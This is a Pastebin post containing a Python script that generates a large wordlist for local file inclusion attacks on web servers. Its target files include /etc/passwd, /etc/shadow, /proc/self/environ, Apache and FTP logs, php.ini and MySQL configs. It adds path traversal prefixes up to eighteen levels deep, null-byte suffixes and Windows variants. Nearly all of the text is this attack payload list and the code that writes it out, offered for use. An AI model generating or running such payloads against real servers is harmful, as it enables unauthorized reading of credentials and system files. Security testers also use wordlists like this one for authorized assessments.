API tools faq
paste
zepek_al

LFI Paths Complete Generator [Huge]

zepek_al
Nov 9th, 2017
226
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 10.66 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # LFI Paths Generator
  3. # Author: live:zepek_al
  4. # Run this Python script. It will produce a huge txt file, named lfipaths_huge.txt, containing thousands of possible LFI paths.
  5. import os
  6.  
  7. def generate(p):  
  8.     ofile.write(p+"\n")
  9.     np = p
  10.     for i in range(1,19):
  11.         if(np[0] == '/'):
  12.             np = "..%s" %np
  13.         else:
  14.             np = "../%s" %np
  15.         ofile.write(np+"\n")
  16.  
  17. basic = ['/etc/passwd', '/etc/shadow', '/etc/group', '/proc/self/environ', '/proc/self/cmdline', '/proc/self/stat',
  18.  '/proc/self/status', '/proc/self/fd/0', '/proc/self/fd/1', '/proc/self/fd/2', '/proc/self/fd/3', '/proc/self/fd/4', '/proc/self/fd/5',
  19.  '/proc/self/fd/6', '/proc/self/fd/7', '/proc/self/fd/8', '/proc/self/fd/9', '/proc/self/fd/10', '/proc/self/fd/11', '/proc/self/fd/12',
  20.  '/proc/self/fd/13', '/proc/self/fd/14', '/proc/self/fd/15', '/proc/self/fd/16', '/proc/self/fd/17', '/proc/self/fd/18', '/proc/self/fd/19',
  21.  '/proc/self/fd/20', '/proc/self/fd/21', '/proc/self/fd/22', '/proc/self/fd/23', '/proc/self/fd/24', '/proc/self/fd/25', '/proc/self/fd/26',
  22.  '/proc/self/fd/27', '/proc/self/fd/28', '/proc/self/fd/29', '/proc/self/fd/30', '/proc/self/fd/31', '/proc/self/fd/32', '/proc/self/fd/33',
  23.  '/proc/self/fd/34', '/proc/self/fd/35', '/var/cpanel/cpanel.config', 'proc/self/environ%00', '/proc/self/environ%00', '/etc/security/group',
  24.  '/etc/security/passwd', '/etc/security/user', '/etc/security/environ', '/etc/security/limits', '/usr/lib/security/mkuser.default',
  25.  '/apache/logs/access.log', '/apache/logs/error.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/error_log', '/var/www/logs/access_log',
  26.  '/usr/local/apache/logs/access_log', '/var/log/apache/access_log', '/var/log/apache2/access_log', '/var/log/access_log', '/var/log/access.log',
  27.  '/var/www/logs/error_log', '/var/www/logs/error.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/var/log/apache/error_log',
  28.  '/var/log/apache2/error_log', '/var/log/apache/error.log', '/var/log/apache2/error.log', '/var/log/error_log', '/var/log/error.log',
  29.  '/var/log/httpd/access_log', '/var/log/httpd/error_log', '/var/log/httpd/access_log', '/var/log/httpd/error_log', '/apache/logs/error.log',
  30.  '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log',
  31.  '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log',
  32.  '/apache2/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log',
  33.  '/logs/access.log', '/logs/error.log', '/logs/access.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log', '/etc/httpd/logs/error_log',
  34.  '/etc/httpd/logs/error.log', '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log', '/usr/local/apache/logs/error_log',
  35.  '/usr/local/apache/logs/error.log', '/usr/local/apache2/logs/access_log', '/usr/local/apache2/logs/access.log', '/usr/local/apache2/logs/error_log',
  36.  '/usr/local/apache2/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log', '/var/www/logs/error_log', '/var/www/logs/error.log',
  37.  '/var/log/httpd/access_log', '/var/log/httpd/access.log', '/var/log/httpd/error_log', '/var/log/httpd/error.log', '/var/log/apache/access_log',
  38.  '/var/log/apache/access.log', '/var/log/apache/error_log', '/var/log/apache/error.log', '/var/log/apache2/access_log', '/var/log/apache2/access.log',
  39.  '/var/log/apache2/error_log', '/var/log/apache2/error.log', '/var/log/access_log', '/var/log/access.log', '/var/log/error_log', '/var/log/error.log',
  40.  '/opt/lampp/logs/access_log', '/opt/lampp/logs/error_log', '/opt/xampp/logs/access_log', '/opt/xampp/logs/error_log', '/opt/lampp/logs/access.log',
  41.  '/opt/lampp/logs/error.log', '/opt/xampp/logs/access.log', '/opt/xampp/logs/error.log', '/Program Files/Apache Group/Apache/logs/access.log',
  42.  '/Program Files/Apache Group/Apache/logs/error.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log',
  43.  '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log',
  44.  '/apache/logs/error.log', '/apache/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/access_log', '/logs/error_log', '/etc/httpd/logs/acces_log',
  45.  '/etc/httpd/logs/acces.log', '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log',
  46.  '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log', '/var/log/apache/access_log', '/var/log/apache/access.log', '/var/log/access_log',
  47.  '/var/www/logs/error_log', '/var/www/logs/error.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/var/log/apache/error_log',
  48.  '/var/log/apache/error.log', '/var/log/access_log', '/var/log/error_log', '/usr/local/apache/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf',
  49.  '/etc/httpd/conf/httpd.conf', '/etc/apache/conf/httpd.conf', '/usr/local/etc/apache/conf/httpd.conf', '/etc/apache2/httpd.conf', '/usr/local/apache/conf/httpd.conf',
  50.  '/usr/local/apache2/conf/httpd.conf', '/usr/local/apache/httpd.conf', '/usr/local/apache2/httpd.conf', '/usr/local/httpd/conf/httpd.conf',
  51.  '/usr/local/etc/apache/conf/httpd.conf', '/usr/local/etc/apache2/conf/httpd.conf', '/usr/local/etc/httpd/conf/httpd.conf', '/usr/apache2/conf/httpd.conf',
  52.  '/usr/apache/conf/httpd.conf', '/usr/local/apps/apache2/conf/httpd.conf', '/usr/local/apps/apache/conf/httpd.conf', '/etc/apache/conf/httpd.conf', '/etc/apache2/conf/httpd.conf',
  53.  '/etc/httpd/conf/httpd.conf', '/etc/http/conf/httpd.conf', '/etc/apache2/httpd.conf', '/etc/httpd/httpd.conf', '/etc/http/httpd.conf', '/etc/httpd.conf', '/opt/apache/conf/httpd.conf',
  54.  '/opt/apache2/conf/httpd.conf', '/var/www/conf/httpd.conf', '/private/etc/httpd/httpd.conf', '/private/etc/httpd/httpd.conf.default', '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  55.  '/Volumes/webBackup/private/etc/httpd/httpd.conf', '/Volumes/webBackup/private/etc/httpd/httpd.conf.default', '/Program Files/Apache Group/Apache/conf/httpd.conf',
  56.  '/Program Files/Apache Group/Apache2/conf/httpd.conf', '/Program Files/xampp/apache/conf/httpd.conf', '/usr/local/php/httpd.conf.php', '/usr/local/php4/httpd.conf.php',
  57.  '/usr/local/php5/httpd.conf.php', '/usr/local/php/httpd.conf', '/usr/local/php4/httpd.conf', '/usr/local/php5/httpd.conf', '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  58.  '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf', '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf', '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  59.  '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php', '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php', '/usr/local/etc/apache/vhosts.conf', '/etc/php.ini', '/bin/php.ini',
  60.  '/etc/httpd/php.ini', '/usr/lib/php.ini', '/usr/lib/php/php.ini', '/usr/local/etc/php.ini', '/usr/local/lib/php.ini', '/usr/local/php/lib/php.ini', '/usr/local/php4/lib/php.ini',
  61.  '/usr/local/php5/lib/php.ini', '/usr/local/apache/conf/php.ini', '/etc/php4.4/fcgi/php.ini', '/etc/php4/apache/php.ini', '/etc/php4/apache2/php.ini', '/etc/php5/apache/php.ini',
  62.  '/etc/php5/apache2/php.ini', '/etc/php/php.ini', '/etc/php/php4/php.ini', '/etc/php/apache/php.ini', '/etc/php/apache2/php.ini', '/web/conf/php.ini', '/usr/local/Zend/etc/php.ini',
  63.  '/opt/xampp/etc/php.ini', '/var/local/www/conf/php.ini', '/etc/php/cgi/php.ini', '/etc/php4/cgi/php.ini', '/etc/php5/cgi/php.ini', '/php5/php.ini', '/php4/php.ini', '/php/php.ini',
  64.  '/PHP/php.ini', '/WINDOWS/php.ini', '/WINNT/php.ini', '/apache/php/php.ini', '/xampp/apache/bin/php.ini', '/NetServer/bin/stable/apache/php.ini', '/home2/bin/stable/apache/php.ini',
  65.  '/home/bin/stable/apache/php.ini', '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini', '/usr/local/cpanel/logs', '/usr/local/cpanel/logs/stats_log', '/usr/local/cpanel/logs/access_log',
  66.  '/usr/local/cpanel/logs/error_log', '/usr/local/cpanel/logs/license_log', '/usr/local/cpanel/logs/login_log', '/usr/local/cpanel/logs/stats_log', '/var/log/mysql/mysql-bin.log',
  67.  '/var/log/mysql.log', '/var/log/mysqlderror.log', '/var/log/mysql/mysql.log', '/var/log/mysql/mysql-slow.log', '/var/mysql.log', '/var/lib/mysql/my.cnf', '/etc/mysql/my.cnf',
  68.  '/etc/my.cnf', '/etc/logrotate.d/proftpd', '/www/logs/proftpd.system.log', '/var/log/proftpd', '/etc/proftp.conf', '/etc/protpd/proftpd.conf', '/etc/vhcs2/proftpd/proftpd.conf',
  69.  '/etc/proftpd/modules.conf', '/var/log/vsftpd.log', '/etc/vsftpd.chroot_list', '/etc/logrotate.d/vsftpd.log', '/etc/vsftpd/vsftpd.conf', '/etc/vsftpd.conf', '/etc/chrootUsers',
  70.  '/var/log/xferlog', '/var/adm/log/xferlog', '/etc/wu-ftpd/ftpaccess', '/etc/wu-ftpd/ftphosts', '/etc/wu-ftpd/ftpusers', '/usr/sbin/pure-config.pl', '/usr/etc/pure-ftpd.conf',
  71.  '/etc/pure-ftpd/pure-ftpd.conf', '/usr/local/etc/pure-ftpd.conf', '/usr/local/etc/pureftpd.pdb', '/usr/local/pureftpd/etc/pureftpd.pdb', '/usr/local/pureftpd/sbin/pure-config.pl',
  72.  '/usr/local/pureftpd/etc/pure-ftpd.conf', '/etc/pure-ftpd/pure-ftpd.pdb', '/etc/pureftpd.pdb', '/etc/pureftpd.passwd', '/etc/pure-ftpd/pureftpd.pdb', '/usr/ports/ftp/pure-ftpd/',
  73.  '/usr/ports/net/pure-ftpd/', '/usr/pkgsrc/net/pureftpd/', '/usr/ports/contrib/pure-ftpd/', '/var/log/pure-ftpd/pure-ftpd.log', '/logs/pure-ftpd.log', '/var/log/pureftpd.log',
  74.  '/var/log/ftp-proxy/ftp-proxy.log', '/var/log/ftp-proxy', '/var/log/ftplog', '/etc/logrotate.d/ftp', '/etc/ftpchroot', '/etc/ftphosts', '/var/log/exim_mainlog', '/var/log/exim/mainlog',
  75.  '/var/log/maillog', '/var/log/exim_paniclog', '/var/log/exim/paniclog', '/var/log/exim/rejectlog', '/var/log/exim_rejectlog']
  76.  
  77. #print len(basic)
  78. os.system("rm lfipaths_huge.txt")
  79. ofile = open("lfipaths_huge.txt","w+")
  80.  
  81. for p in basic:
  82.     generate(p)
  83.     generate(p+"%00")
  84.  
  85. extra = ['C:\\boot.ini','C:/boot.ini','C:\wamp\logs\\access.log','c:\wamp\logs\\access.log','c:/wamp/logs/access.log',
  86.          'C:/wamp/logs/access.log','C:/xampp/logs/access.log','c:/xampp/logs/access.log','C:/WAMP/logs/access.log','C:\\xampp\logs\\access.log',
  87.          'c:\\boot.ini','c:/boot.ini','C:/XAMPP/logs/access.log','c:/XAMPP/logs/access.log','C:\XAMPP\logs\\access.log',
  88.          'c:\XAMPP\logs\\access.log','D:\\boot.ini','D:/boot.ini','D:\wamp\logs\\access.log','d:\wamp\logs\\access.log',
  89.          'd:/wamp/logs/access.log','D:/wamp/logs/access.log','D:/xampp/logs/access.log','d:/xampp/logs/access.log',
  90.          'D:/WAMP/logs/access.log','D:\\xampp\logs\\access.log','d:\\boot.ini','d:/boot.ini','D:/XAMPP/logs/access.log',
  91.          'd:/XAMPP/logs/access.log','D:\XAMPP\logs\\access.log','d:\XAMPP\logs\\access.log']
  92.  
  93. for e in extra:
  94.     ofile.write(e+"\n")
  95.  
  96. ofile.close()
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!